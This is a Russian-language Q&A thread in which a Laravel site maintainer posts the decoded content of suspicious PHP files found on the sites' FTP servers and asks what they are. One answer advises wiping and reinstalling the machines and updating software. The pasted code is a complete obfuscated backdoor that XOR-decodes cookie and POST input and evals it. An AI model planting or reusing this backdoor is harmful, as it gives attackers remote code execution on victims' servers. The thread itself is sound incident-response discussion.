Подозрительно выглядящие файлы неожиданно появились на FTP-сервере

Question

Для клиента я поддерживаю небольшую группу веб-сайтов, построенных на PHP Laravel. В последнее время, работая над ними, я обнаружил пару новых подозрительно выглядящих файлов, которые внезапно появились на двух FTP-серверах веб-сайтов. Файлы изначально не являются частью кодовой базы, и я понятия не имею, откуда они вдруг взялись. Всего существует три файла с именами b3lo5x3x.php, cache.php и plugin.php, которые находятся в корневом каталоге веб-сайтов.

Содержание файлов выглядит довольно тревожно. При декодировании на unphp.net я получаю следующий результат, который является одинаковым для всех трех файлов. Размер всех трех файлов также одинаков.

<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
    function dgubnv($fvgiv, $lfpfzw, $nclll) {
        return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
    }
    function oocfo($fvgiv, $elasr) {
        return @$fvgiv[9]($fvgiv[1], $elasr);
    }
    function yiugt($fvgiv, $elasr) {
        $vezpr = $fvgiv[3]($elasr) % 3;
        if (!$vezpr) {
            eval($elasr[1]($elasr[2]));
            exit();
        }
    }
    $wqudv = oocfo($fvgiv, $wqudv);
    yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>

Кто-нибудь знает, что это может быть? Может ли быть так, что FTP-серверы заражены каким-либо вредоносным или хакерским инструментом?

Answer 1

Протрите машины, пострадавшие полностью. Вам необходимо переустановить проект (ы) Laravel на новую чистую машину. Вы также должны проверить их и любое другое программное обеспечение, если это возможно.

Убедитесь, что все программное обеспечение на сервере также обновлено. Скорее всего, вы скомпрометированы из-за не обновленного программного обеспечения с известной уязвимостью.